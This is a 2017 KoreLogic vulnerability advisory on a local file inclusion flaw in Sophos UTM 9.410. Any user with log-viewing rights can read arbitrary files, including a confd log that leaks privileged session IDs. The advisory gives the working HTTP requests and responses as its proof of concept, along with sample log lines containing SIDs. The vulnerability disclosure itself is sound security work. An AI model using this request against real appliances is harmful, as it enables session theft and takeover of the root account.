KL-001-2017-021 : Sophos UTM 9 Management Appplication Local File Inclusion Title: Sophos UTM 9 Management Application Local File Inclusion Advisory ID: KL-001-2017-021 Publication Date: 2017.10.24 Publication URL: https://www.korelogic.com/Resources/Advisories/KL-001-2017-021.txt 1. Vulnerability Details Affected Vendor: Sophos Affected Product: UTM 9 Affected Version: 9.410 Platform: Embedded Linux CWE Classification: CWE-538: File and Directory Information Exposure, CWE-264: Permissions, Privileges, and Access Controls, CWE-532: Information Exposure Through Log Files Impact: Information Disclosure Attack vector: HTTP 2. Vulnerability Description Any user is has log viewing rights provisioned can read arbitrary files from the local filesystem as a limited privilege user. This can be used to read the confd log file and obtain root privilege SID values. 3. Technical Description Any user who has permission to access the 'Logging & Reporting' functionality within the management application can read arbitrary files. POST /webadmin.plx HTTP/1.1 Host: 1.3.3.7:4444 Accept-Language: en-US,en;q=0.5 X-Requested-With: XMLHttpRequest X-Prototype-Version: 1.5.1.1 Content-Type: application/json; charset=UTF-8 Content-Length: 313 Cookie: SID=SoCKGdoKFmeobxZTEWDz DNT: 1 Connection: close {"objs": [{"filename": "/var/log/confd.log", "FID": "log_download_single"}], "SID": "SoCKGdoKFmeobxZTEWDz", "browser": "gecko", "backend_version": "2", "loc": "english", "_cookie": null, "wdebug": 0, "RID": "1491835733989_0.7813499665507969", "current_uuid": "189fb61e-e01b-11da-8017-0014221e9eba", "ipv6": false} HTTP/1.1 200 OK Date: Mon, 10 Apr 2017 07:49:51 GMT Server: Apache Expires: Thursday, 01-Jan-1970 00:00:01 GMT Pragma: no-cache X-Frame-Options: SAMEORIGIN X-Content-Type-Option: nosniff X-XSS-Protection: 1; mode=block Vary: Accept-Encoding Connection: close Content-Type: application/json; charset=utf-8 Content-Length: 605 {"SID":"SoCKGdoKFmeobxZTEWDz","ipv6":false,"current_uuid":"189fb61e-e01b-11da-8017-0014221e9eba","browser":"gecko","RID":"1491835733989_0.7813499665507969","js":"if($(\"topbar_icon\")){$(\"topbar_icon\").src=\"core/img/topbar/topbar_user.png\";}toggle_who_is_watching(0);","backend_version":"2","loc":"english","globals_data":["SoCKGdoKFmeobxZTEWDz"],"globals":["SID"],"objs":[{"current_uuid":"189fb61e-e01b-11da-8017-0014221e9eba","FID":"log_download_single","filename":"/var/log/confd.log","js":"start_download('var/SoCKGdoKFmeobxZTEWDz/downloads/singlelogfile/confd-debug.log');"}],"_cookie":null,"wdebug":0} The start_download() function is JavaScript loaded into the browser. This function takes the given parameter and uses it to build the subsequent HTTP GET request. GET /var/SoCKGdoKFmeobxZTEWDz/downloads/singlelogfile/confd-debug.log HTTP/1.1 Host: 1.3.3.7:4444 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:52.0) Gecko/20100101 Firefox/52.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Referer: https://1.3.3.7:4444/ Cookie: SID=SoCKGdoKFmeobxZTEWDz DNT: 1 Connection: close Upgrade-Insecure-Requests: 1 HTTP/1.1 200 OK Date: Mon, 10 Apr 2017 07:51:02 GMT Server: Apache X-Frame-Options: SAMEORIGIN X-Content-Type-Option: nosniff X-XSS-Protection: 1; mode=block Cache-Control: max-age=31536000 Expires: Tue, 10 Apr 2018 07:51:02 GMT Vary: Accept-Encoding Connection: close Content-Type: text/plain; charset=utf-8 Content-Length: 2595127 2017:04:02-00:00:01 hostname confd[28056]: D Role::authenticate:185() => id="3106" severity="debug" sys="System" sub="confd" name="authentication successful" user="system" srcip="127.0.0.1" sid="oLwZJzlZQcXRrgpDZtwv" facility="system" client="ips-reporter.pl" call="new"<31>Apr 2 00:00:01 confd[28056]: D sys::AUTOLOAD:303() => id="3100" severity="debug" sys="System" sub="confd" name="external call" user="system" srcip="127.0.0.1" facility="system" client="ips-reporter.pl" lock="none" method="get_SID" 2017:04:02-00:00:01 hostname confd[28056]: D sys::AUTOLOAD:303() => id="3100" severity="debug" sys="System" sub="confd" name="external call" user="system" srcip="127.0.0.1" facility="system" client="ips-reporter.pl" lock="none" method="signal_unsubscribe" 2017:04:02-00:00:01 hostname confd[28056]: D sys::AUTOLOAD:303() => id="3100" severity="debug" sys="System" sub="confd" name="external call" user="system" srcip="127.0.0.1" facility="system" client="ips-reporter.pl" lock="none" method="logout" 2017:04:02-00:00:01 hostname confd[28056]: D Session::terminate:290() => id="3100" severity="debug" sys="System" sub="confd" name="closing session" user="system" srcip="127.0.0.1" sid="oLwZJzlZQcXRrgpDZtwv" facility="system" client="ips-reporter.pl" call="logout" function="logout" 2017:04:02-00:00:01 hostname confd[28056]: D sys::DESTROY:231() => id="3100" severity="debug" sys="System" sub="confd" name="worker process exiting" user="system" srcip="127.0.0.1" facility="system" client="ips-reporter.pl" 2017:04:02-00:00:01 hostname confd[28070]: D Role::authenticate:185() => id="3106" severity="debug" sys="System" sub="confd" name="authentication successful" user="system" srcip="127.0.0.1" sid="sJpVhmspOPKYYxNAcfEj" facility="system" client="spx-password-expire" call="new"<31>Apr 2 00:00:01 confd[28070]: D sys::AUTOLOAD:303() => id="3100" severity="debug" sys="System" sub="confd" name="external call" user="system" srcip="127.0.0.1" facility="system" client="spx-password-expire" lock="none" method="get_SID" 2017:04:02-00:00:01 hostname confd[28070]: D sys::AUTOLOAD:303() => id="3100" severity="debug" sys="System" sub="confd" name="external call" user="system" srcip="127.0.0.1" facility="system" client="spx-password-expire" lock="none" method="get" 2017:04:02-00:00:01 hostname confd[28070]: D sys::AUTOLOAD:303() => id="3100" severity="debug" sys="System" sub="confd" name="external call" user="system" srcip="127.0.0.1" facility="system" client="spx-password-expire" lock="none" method="logout" 2017:04:02-00:00:01 hostname confd[28070]: D Session::terminate:290() => id="3100" severity="debug" sys="System" sub="confd" name="closing session" user="system" srcip="127.0.0.1" sid="sJpVhmspOPKYYxNAcfEj" facility="system" client="spx-password-expire" call="logout" function="logout" 2017:04:02-00:00:02 hostname confd[28070]: D sys::DESTROY:231() => id="3100" severity="debug" sys="System" sub="confd" name="worker process exiting" user="system" srcip="127.0.0.1" facility="system" client="spx-password-expire" 2017:04:02-00:00:01 hostname confd[28083]: D Role::authenticate:185() => id="3106" severity="debug" sys="System" sub="confd" name="authentication successful" user="system" srcip="127.0.0.1" sid="bgpZDQBWHcNGvvQKTjPj" facility="system" client="admin-reporter.pl" call="new"<31>Apr 2 00:00:02 confd[28083]: D sys::AUTOLOAD:303() => id="3100" severity="debug" sys="System" sub="confd" name="external call" user="system" srcip="127.0.0.1" facility="system" client="admin-reporter.pl" lock="none" method="get_SID" 2017:04:02-00:00:01 hostname confd[28086]: D Role::authenticate:185() => id="3106" severity="debug" sys="System" sub="confd" name="authentication successful" user="system" srcip="127.0.0.1" sid="BXeDpxEvboHeDEmaaHEY" facility="system" client="vpnreporter" call="new"<31>Apr 2 00:00:02 confd[28086]: D sys::AUTOLOAD:303() => id="3100" severity="debug" sys="System" sub="confd" name="external call" user="system" srcip="127.0.0.1" facility="system" client="vpnreporter" lock="none" method="get_SID" 2017:04:02-00:00:01 hostname confd[28088]: D Role::authenticate:185() => id="3106" severity="debug" sys="System" sub="confd" name="authentication successful" user="system" srcip="127.0.0.1" sid="SBggtglcePoJTWtmkIMO" facility="system" client="websecreporter" call="new"<31>Apr 2 00:00:02 confd[28088]: D sys::AUTOLOAD:303() => id="3100" severity="debug" sys="System" sub="confd" name="external call" user="system" srcip="127.0.0.1" facility="system" client="websecreporter" lock="none" method="get_SID" 2017:04:02-00:00:02 hostname confd[28086]: D sys::AUTOLOAD:303() => id="3100" severity="debug" sys="System" sub="confd" name="external call" user="system" srcip="127.0.0.1" facility="system" client="vpnreporter" lock="none" method="signal_subscribe" 2017:04:02-00:00:02 hostname confd[28083]: D sys::AUTOLOAD:303() => id="3100" severity="debug" sys="System" sub="confd" name="external call" user="system" srcip="127.0.0.1" facility="system" client="admin-reporter.pl" lock="none" method="signal_unsubscribe" 2017:04:02-00:00:02 hostname confd[28088]: D sys::AUTOLOAD:303() => id="3100" severity="debug" sys="System" sub="confd" name="external call" user="system" srcip="127.0.0.1" facility="system" client="websecreporter" lock="none" method="signal_subscribe" 2017:04:02-00:00:02 hostname confd[28083]: D sys::AUTOLOAD:303() => id="3100" severity="debug" sys="System" sub="confd" name="external call" user="system" srcip="127.0.0.1" facility="system" client="admin-reporter.pl" lock="none" method="logout" 2017:04:02-00:00:02 hostname confd[28083]: D Session::terminate:290() => id="3100" severity="debug" sys="System" sub="confd" name="closing session" user="system" srcip="127.0.0.1" sid="bgpZDQBWHcNGvvQKTjPj" facility="system" client="admin-reporter.pl" call="logout" function="logout" ... ... The logging of 'sid' values is also dangerous because it leaks session identifiers who may be of higher privilege. A 'sid' for the admin account can be used to change the root and loginuser passwords. 4. Mitigation and Remediation Recommendation The vendor has addressed this vulnerability in version 9.503. Release notes and download instructions can be found at: https://community.sophos.com/products/unified-threat-management/b/utm-blog/posts/utm-up2date-9-503-released 5. Credit This vulnerability was discovered by Matt Bergin (@thatguylevel) of KoreLogic, Inc. 6. Disclosure Timeline 2017.07.21 - KoreLogic submits vulnerability details to Sophos. 2017.07.21 - Sophos acknowledges receipt. 2017.09.01 - 30 business days have elapsed since the vulnerability was reported to Sophos. 2017.09.15 - KoreLogic requests an update on the status of this and other vulnerabilities reported to Sophos. 2017.09.18 - Sophos informs KoreLogic that this issue has been remediated in release 9.503 for UTM. 2017.10.24 - KoreLogic public disclosure. 7. Proof of Concept See 3. Technical Description. The contents of this advisory are copyright(c) 2017 KoreLogic, Inc. and are licensed under a Creative Commons Attribution Share-Alike 4.0 (United States) License: http://creativecommons.org/licenses/by-sa/4.0/ KoreLogic, Inc. is a founder-owned and operated company with a proven track record of providing security services to entities ranging from Fortune 500 to small and mid-sized companies. We are a highly skilled team of senior security consultants doing by-hand security assessments for the most important networks in the U.S. and around the world. We are also developers of various tools and resources aimed at helping the security community. https://www.korelogic.com/about-korelogic.html Our public vulnerability disclosure policy is available at: https://www.korelogic.com/KoreLogic-Public-Vulnerability-Disclosure-Policy.v2.2.txt